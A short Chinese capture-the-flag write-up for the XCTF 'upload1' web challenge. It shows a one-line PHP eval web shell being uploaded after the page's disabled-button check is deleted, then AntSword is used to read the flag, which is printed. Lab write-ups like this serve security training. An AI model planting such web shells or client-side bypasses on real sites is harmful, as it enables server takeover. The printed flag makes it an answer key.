【愚公系列】2022年01月 攻防世界-进阶题-WEB-013(upload1)
【摘要】 一、upload1题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=1&page=1 二、使用步骤 1.点击获取在线场景 2.场景分析发现是一个文件上传界面,不用想肯定是文件上传漏洞准备木马文件,上传<?php @eval($_POST[root]); ?>发现上传按钮不可用了,按F12查看源代码...
一、upload1
题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=1&page=1
二、使用步骤
1.点击获取在线场景
2.场景分析
发现是一个文件上传界面,不用想肯定是文件上传漏洞
准备木马文件,上传
<?php @eval($_POST[root]); ?>
发现上传按钮不可用了,按F12查看源代码
把 disabled删了就可以上传文件,上传成功
2.中国蚁剑
发现html文件夹下有flag.php文件
打开flag.php文件
得到flag:cyberpeace{10802345813d5a2e2c26fc5f62b3e7aa}
总结
- php木马文件
- 前端改写源码(或者用burpsuit进行后缀改写)
- 中国蚁剑
【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱:
cloudbbs@huaweicloud.com
- 点赞
- 收藏
- 关注作者
评论(0)